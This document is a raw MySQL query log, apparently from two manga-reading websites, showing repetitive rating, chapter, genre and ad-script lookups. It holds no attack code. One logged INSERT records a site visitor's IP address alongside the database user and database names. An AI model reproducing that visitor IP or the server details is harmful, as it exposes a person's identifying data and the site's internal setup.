manga_id = '94' order by created desc 330642055 Quit 330642056 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642056 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330642056 Quit 330642057 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642057 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330642057 Quit 330642058 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642058 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330642058 Quit 330642059 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642059 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330642059 Quit 330642060 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642060 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330642060 Quit 330642061 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642061 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330642061 Quit 330642062 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642062 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '208' order by created desc 330642062 Quit 330642063 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642063 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330642063 Quit 330642064 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642064 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330642064 Quit 330642065 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642065 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330642065 Quit 330642066 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642066 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330642066 Quit 330642067 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642067 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330642067 Quit 330642068 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642068 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330642068 Quit 330642069 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642069 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330642069 Quit 330642070 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642070 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330642070 Quit 330642071 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642071 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330642071 Quit 330642072 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642072 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '269' order by created desc 330642072 Quit 330642073 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642073 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330642073 Quit 330642074 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642074 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330642074 Quit 330642075 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642075 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330642075 Quit 330642076 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642076 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330642076 Quit 330642077 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642077 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330642077 Quit 330642078 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642078 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330642078 Quit 330642079 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642079 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330642079 Quit 330642080 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642080 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330642080 Quit 330642081 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642081 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330642081 Quit 330642082 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642082 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330642082 Quit 330642083 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642083 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330642083 Quit 330642084 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642084 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330642084 Quit 330642085 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642085 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330642085 Quit 330642086 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642086 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330642086 Quit 330642087 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642087 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330642087 Quit 330642088 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642089 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642089 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '345' and m.active = 1 330642088 Quit 330642089 Quit 330642090 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642090 Query select * FROM chapters where id = '345' 330642090 Quit 330642091 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642091 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330642091 Quit 330642092 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642092 Query Update chapters set view=view+1 where id = '345' 330642092 Quit 330642093 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642093 Query select * FROM chapters where id = '345' 330642093 Quit 330642094 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642094 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '345' and m.active = 1 330642094 Quit 330642095 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642095 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '345', '107.77.206.202', 'mangaberri.com', '2026-02-26 03:28:11', '2026-02-26 03:28:11') 330642095 Quit 330642096 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642096 Query select * FROM chapter_images where chapter_id = '345' 330642096 Quit 330642097 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642097 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330642097 Quit 330642098 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642098 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330642098 Quit 330642099 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642100 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642099 Quit 330642100 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642100 Quit 330642101 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642102 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642101 Quit 330642102 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642102 Quit 330642103 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642104 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642104 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642104 Quit 330642103 Quit 330642105 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642106 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330642105 Quit 330642106 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330642106 Quit 330642013 Quit 330642107 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642108 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642107 Quit 330642108 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330642108 Quit 330642109 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642109 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330642109 Quit 330642110 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642110 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330642110 Quit 330642111 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642111 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330642111 Quit 330642112 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642112 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330642112 Quit 330642113 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642113 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330642113 Quit 330642114 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642114 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330642114 Quit 330642115 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642115 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330642115 Quit 330642116 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642116 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '88' order by created desc 330642116 Quit 330642117 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642117 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330642117 Quit 330642118 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642118 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330642118 Quit 330642119 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642119 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330642119 Quit 330642120 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642120 Query select * FROM chapters where manga_id = '387' order by created desc limit 1 330642120 Quit 330642121 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642121 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330642121 Quit 330642122 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642122 Query select * FROM chapters where manga_id = '272' order by created desc limit 1 330642122 Quit 330642123 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642123 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330642123 Quit 330642124 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642124 Query select * FROM chapters where manga_id = '361' order by created desc limit 1 330642124 Quit 330642125 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642125 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330642125 Quit 330642126 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642126 Query select * FROM chapters where manga_id = '57' order by created desc limit 1 330642126 Quit 330642127 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642127 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330642127 Quit 330642128 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642128 Query select * FROM chapters where manga_id = '285' order by created desc limit 1 330642128 Quit 330642129 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642129 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330642129 Quit 330642130 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642130 Query select * FROM chapters where manga_id = '104' order by created desc limit 1 330642130 Quit 330642131 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642131 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330642131 Quit 330642132 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642132 Query select * FROM chapters where manga_id = '290' order by created desc limit 1 330642132 Quit 330642133 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642133 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '40' order by created desc 330642133 Quit 330642134 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642134 Query select * FROM chapters where manga_id = '40' order by created desc limit 1 330642134 Quit 330642135 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642135 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330642135 Quit 330642136 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642136 Query select * FROM chapters where manga_id = '386' order by created desc limit 1 330642136 Quit 330642137 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642137 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330642137 Quit 330642138 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642138 Query select * FROM chapters where manga_id = '385' order by created desc limit 1 330642138 Quit 330642139 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642139 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330642139 Quit 330642140 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642140 Query select * FROM chapters where manga_id = '384' order by created desc limit 1 330642140 Quit 330642141 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642141 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330642141 Quit 330642142 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642142 Query select * FROM chapters where manga_id = '382' order by created desc limit 1 330642142 Quit 330642143 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642143 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330642143 Quit 330642144 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642144 Query select * FROM chapters where manga_id = '80' order by created desc limit 1 330642144 Quit 330642145 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642145 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330642145 Quit 330642146 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642146 Query select * FROM chapters where manga_id = '377' order by created desc limit 1 330642146 Quit 330642147 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642147 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330642147 Quit 330642148 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642148 Query select * FROM chapters where manga_id = '390' order by created desc limit 1 330642148 Quit 330642149 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642149 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330642149 Quit 330642150 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642150 Query select * FROM chapters where manga_id = '327' order by created desc limit 1 330642150 Quit 330642151 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642151 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330642151 Quit 330642152 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642152 Query select * FROM chapters where manga_id = '376' order by created desc limit 1 330642152 Quit 330642153 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642153 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330642153 Quit 330642154 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642154 Query select * FROM chapters where manga_id = '373' order by created desc limit 1 330642154 Quit 330642155 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642155 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330642155 Quit 330642156 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642156 Query select * FROM chapters where manga_id = '388' order by created desc limit 1 330642156 Quit 330642157 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642157 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '173' order by created desc 330642157 Quit 330642158 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642158 Query select * FROM chapters where manga_id = '173' order by created desc limit 1 330642158 Quit 330642159 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642159 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330642159 Quit 330642160 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642160 Query select * FROM chapters where manga_id = '35' order by created desc limit 1 330642160 Quit 330642161 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642161 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330642161 Quit 330642162 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642162 Query select * FROM chapters where manga_id = '296' order by created desc limit 1 330642162 Quit 330642163 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642163 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330642163 Quit 330642164 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642164 Query select * FROM chapters where manga_id = '22' order by created desc limit 1 330642164 Quit 330642165 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642165 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '83' order by created desc 330642165 Quit 330642166 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642166 Query select * FROM chapters where manga_id = '83' order by created desc limit 1 330642166 Quit 330642167 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642167 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330642167 Quit 330642168 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642168 Query select * FROM chapters where manga_id = '346' order by created desc limit 1 330642168 Quit 330642169 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642169 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330642169 Quit 330642170 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642170 Query select * FROM chapters where manga_id = '240' order by created desc limit 1 330642170 Quit 330642171 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642171 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330642171 Quit 330642172 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642172 Query select * FROM chapters where manga_id = '50' order by created desc limit 1 330642172 Quit 330642173 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642173 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330642173 Quit 330642174 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642174 Query select * FROM chapters where manga_id = '27' order by created desc limit 1 330642174 Quit 330642175 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642175 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330642175 Quit 330642176 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642176 Query select * FROM chapters where manga_id = '92' order by created desc limit 1 330642176 Quit 330642177 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642177 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330642177 Quit 330642178 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642178 Query select * FROM chapters where manga_id = '289' order by created desc limit 1 330642178 Quit 330642179 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642179 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330642179 Quit 330642180 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642180 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330642180 Quit 330642181 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642181 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330642181 Quit 330642182 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642182 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330642182 Quit 330642183 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642183 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330642183 Quit 330642184 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642184 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330642184 Quit 330642185 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642185 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330642185 Quit 330642186 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642186 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330642186 Quit 330642187 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642187 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330642187 Quit 330642188 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642188 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330642188 Quit 330642189 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642189 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330642189 Quit 330642190 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642190 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330642190 Quit 330642191 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642191 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330642191 Quit 330642192 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642192 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330642192 Quit 330642193 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642193 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330642193 Quit 330642194 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642194 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330642194 Quit 330642195 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642195 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330642195 Quit 330642196 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642196 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330642196 Quit 330642197 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642197 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330642197 Quit 330642198 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642198 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330642198 Quit 330642199 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642199 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330642199 Quit 330642200 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642200 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330642200 Quit 330642201 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642201 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330642201 Quit 330642202 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642202 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330642202 Quit 330642203 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642203 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330642203 Quit 330642204 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642204 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330642204 Quit 330642205 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642205 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330642205 Quit 330642206 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642206 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330642206 Quit 330642207 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642207 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330642207 Quit 330642208 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642208 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330642208 Quit 330642209 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642209 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330642209 Quit 330642210 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642210 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330642210 Quit 330642211 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642211 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330642211 Quit 330642212 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642212 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330642212 Quit 330642213 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642213 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330642213 Quit 330642214 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642214 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330642214 Quit 330642215 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330642215 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330642215 